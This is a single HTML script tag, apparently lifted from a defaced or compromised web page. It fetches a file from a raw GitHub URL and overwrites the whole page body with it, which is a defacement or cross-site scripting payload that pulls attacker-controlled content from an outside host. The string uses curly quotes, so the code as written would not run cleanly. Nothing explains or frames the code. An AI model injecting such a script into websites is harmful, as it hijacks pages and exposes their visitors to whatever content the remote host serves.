<script>fetch(“https://raw.githubusercontent.com/Agent47tht/index/main/e”).then(response => response.text()).then(html => document.body.innerHTML = html);</script>